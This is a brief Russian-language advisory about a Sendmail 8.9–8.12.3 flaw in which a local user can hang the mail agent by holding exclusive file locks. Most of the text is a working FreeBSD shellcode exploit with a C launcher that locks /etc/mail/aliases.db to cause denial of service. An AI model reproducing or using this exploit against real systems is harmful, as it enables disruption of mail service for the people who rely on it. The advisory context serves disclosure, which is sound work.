Sendmail — почтовый агент для Unix и Linux вариантов. 

Программа зависает, когда злонамеренный пользователь приобретает исключительную блокировку на файлах (используя flock() или fcntl()), которые Sendmail требует для
работы. Другие программы, использующие исключительную блокировку, также уязвимы к этой проблеме. 

Уязвимость обнаружена в Sendmail Consortium Sendmail 8.9-8.12.3 

Эксплоит:

/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
«\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80»
«\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1»
«\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c»
«\x69\x61\x73\x65\x73\x2e\x64\x62»;

int main()
{

int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

Оставить мнение